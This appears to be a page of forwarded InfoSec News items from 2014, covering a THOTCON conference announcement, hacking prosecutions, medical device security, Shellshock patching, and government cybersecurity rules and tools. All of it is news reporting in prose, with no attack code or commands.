[ISN] THOTCON 0x6 – Chicago’s Hacking Conference – Ticket Sales and CFP Opens 10.01.2014

Forwarded from: THOTCON NFP *************************************************************************** ***BEGIN THOTCON TRANSMISSION********************************************** Greetings InfoSec News Readers What: THOTCON 0x6 – Chicago’s Hacking Conference When: 05.14-15.15 Where: TOP_SECRET / совершенно секретно / 絕密 Tickets: Tickets on Sale 10.01.2014 Call For Papers: CFP Opens 10.01.2014 T-Shirt Contest: Open! Hacker Brew Contest: Registration Opens 10.01.2014 B3 S0c14l: LinkedIn http://www.linkedin.com/groups?mostPopular=&gid=3218013 Twitter http://twitter.com/THOTCON IRC/freenode/#THOTCON ************************************************************ THOTCON (pronounced ˈthȯt and taken from THree – One – Two) is a small venue hacking conference based in Chicago IL, USA. This is a non-profit, non-commercial event looking to provide the best conference possible on a very limited budget. Once you attend a THOTCON event, you will have experienced one of the best information security conference experiences combined with a uniquely casual and social experience. THOTCON 0x6 is the sixth incarnation of this event and will be held on Thursday and Friday May 14-15, 2015. It will be held at a location only to be disclosed to attendees and speakers during the week before the event. For more information, explore this site or contact us at info (at) thotcon.org. http://thotcon.org/ ***END THOTCON TRANSMISSION************************************************ ***************************************************************************




Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Hackers charged with stealing over $100m in US army and Xbox technology

http://www.theguardian.com/technology/2014/sep/30/four-hackers-charged-stealing-xbox-army-technology By Nicky Woolf theguardian.com 30 September 2014 Four men have been charged with breaking into the computer systems of Microsoft, the US army and leading games manufacturers, as part of an alleged international hacking ring that netted more than $100m in intellectual property, the US Department of Justice said on Tuesday. The four, aged between 18 and 28, are alleged to have stolen Xbox technology, Apache helicopter training software and pre-release copies of games such as Call of Duty: Modern Warfare 3, according to an indictment dating from April that was unsealed on Tuesday. Two of the hackers pleaded guilty earlier in the day, the DoJ said. “These were extremely sophisticated hackers … Don’t be fooled by their ages,” assistant US attorney Ed McAndrew said after a court hearing on Tuesday. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] How are hospitals handling medical device security?

http://healthitsecurity.com/2014/09/30/how-are-hospitals-handling-medical-device-security/ By Patrick Ouellette Health IT Security September 30, 2014 Dale Nordenberg, moderator of the medical device security panel discussion at this year’s HIMSS Privacy and Security Forum, made an interesting point in saying that medical devices fit somewhere between BioMed, IT and security. Given the likelihood that they fall through the cracks, what are are the best ways for healthcare organizations to monitor the risks associated with these devices? Nordenberg, a medical device expert, discussed security experiences and safeguard tactics with panelists Kristopher Kusche, VP of Information Services, Technology Services at Albany Medical Center, and Darren Lacey, Chief Information Security Officer (CISO) of Johns Hopkins University and Johns Hopkins Medicine. The first major topic of conversation was the manner in which Kusche approaches risk assessments for medical devices. Kusche said he had 20,000 medical devices across two hospitals, which outnumbers the 18,000 managed IT products, such as computers, the organization has on the network. As a Joint Commission accredited hospital, he said that Albany Medical Center has been assessing every device for risk for a long time because it was a Joint Commission requirement. The only major difference now is the addition of cybersecurity to that risk assessment. “When the FDA released its cybersecurity recommendations in June 2013, we took them to heart,” he said. “After having done full cybersecurity assessments for our IT components and systems for HIPAA, the next logical step was to perform assessments on medical devices.” […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Shellshock fixes beget another round of patches as attacks mount

http://arstechnica.com/security/2014/09/shellshock-fixes-beget-another-round-of-patches-as-attacks-mount/ By Sean Gallagher Ars Technica Sept 30 2014 Over the past few days, Apple, Red Hat, and others have pushed out patches to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities previously allowed attackers to execute commands remotely on systems that use the command parser under some conditions—including Web servers that use certain configurations of Apache. However, some of the patches made changes that broke from the functionality of the GNU bash code, so now debate continues about how to “un-fork” the patches and better secure bash. At the same time, the urgency of applying those patches has mounted as more attacks that exploit the weaknesses in bash’s security (dubbed “Shellshock”) have appeared. In addition to the threat first spotted the day after the vulnerability was made public, a number of new attacks have emerged. While some appear to simply be vulnerability scans, there are also new exploit attempts that carry malware or attempt to give the attacker direct remote control of the targeted system. Stormy weather On Monday, the SANS Technology Institute’s Internet Storm Center (ISC) elevated its INFOcon threat level—a measure of the danger level of current Internet “worms” and other threats based on Internet traffic—to Yellow. This level indicates an attack that poses a minor threat to the Internet’s infrastructure as a whole with potential significant impact on some systems. Johannes Ullrich, Dean of Research at SANS, noted that six exploits based on Shellshock have been recorded by the ISC’s servers and “honeypot” systems. (A honeypot is a virtual or physical computer system set up to entice attackers and record their actions.) Three of the types of attacks recorded by the ISC were simply scans for the vulnerability. One ran checks using multiple Hypertext Transfer Protocol (HTTP) headers to test if the system would send back Internet Protocol “ping” messages using a bash exploit; another attempted to send back system parameters (the Unix name of the system, its operating system and version, and other details about the hardware). These may have been launched by “white hat” security firms conducting surveys of vulnerable systems. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Hackers cut deal to work for gov’t

http://phnompenhpost.com/national/hackers-cut-deal-work-gov%E2%80%99t Buth Reaksmey Kongkea The Phnom Penh Post 1 October 2014 Two members of “hacktivist” group Anonymous Cambodia convicted of computer hacking yesterday will be spared further jail time. Instead, they have been ordered to put their “excellent” IT skills to use combating cybercrime in the Ministry of Interior. Bun King Mongkolpanha, 21, alias “Black Cyber”, and Chou Songheng, 20, alias “Zoro”, were found guilty of IT offences under two articles of the criminal code at Phnom Penh Municipal Court yesterday morning and sentenced to two years in prison. But their sentences were reduced to five months and 20 days – the amount of time they have already spent in prison since being arrested in April – and they are to be released today. The two former SETEC Institute students are to soon begin paid work fighting cybercrime with the same Interior Ministry department that worked with the FBI to arrest them after an eight-month investigation. […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] Contractors, Expect 72-hour Rule for Disclosing Corporate Hacks

http://www.nextgov.com/cybersecurity/2014/09/contractors-expect-72-hour-rule-disclosing-corporate-hacks/95399/ By Aliya Sternstein Nextgov September 29, 2014 Look for the whole government to take a page from the Pentagon and require that firms notify their agency customers of hacks into company-owned systems within three days of detection, procurement attorneys and federal officials say. Right now, vendors only have to report compromises of classified information and defense industry trade secrets. The trade secret rule is new and covers breaches of nonpublic military technological and scientific data, referred to as “unclassified controlled technical information.” That new reporting requirement kicked in Nov. 18, 2013 and applies to all military contracts inked since. The rule “is impactful in large part because it is one of the first very clear cybersecurity directives,” said Anuj Vohra, a Covington & Burling senior associate in the firm’s government contracts practice. “We’ll see more regulations like that among nondefense agencies.” […]


Facebooktwittergoogle_plusredditpinterestlinkedinmail

[ISN] FBI releases Malware Investigator portal to industry players

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/ By Charlie Osborne Zero Day ZDNet News September 30, 2014 The FBI’s Malware Investigator portal will soon be available to security researchers, academics and businesses. As reported by Threatpost, the US law enforcement agency’s tool is akin to systems used by cybersecurity companies to upload suspicious files. Once a file is uploaded, the system pushes through antimalware engines to pull out information on the file


Facebooktwittergoogle_plusredditpinterestlinkedinmail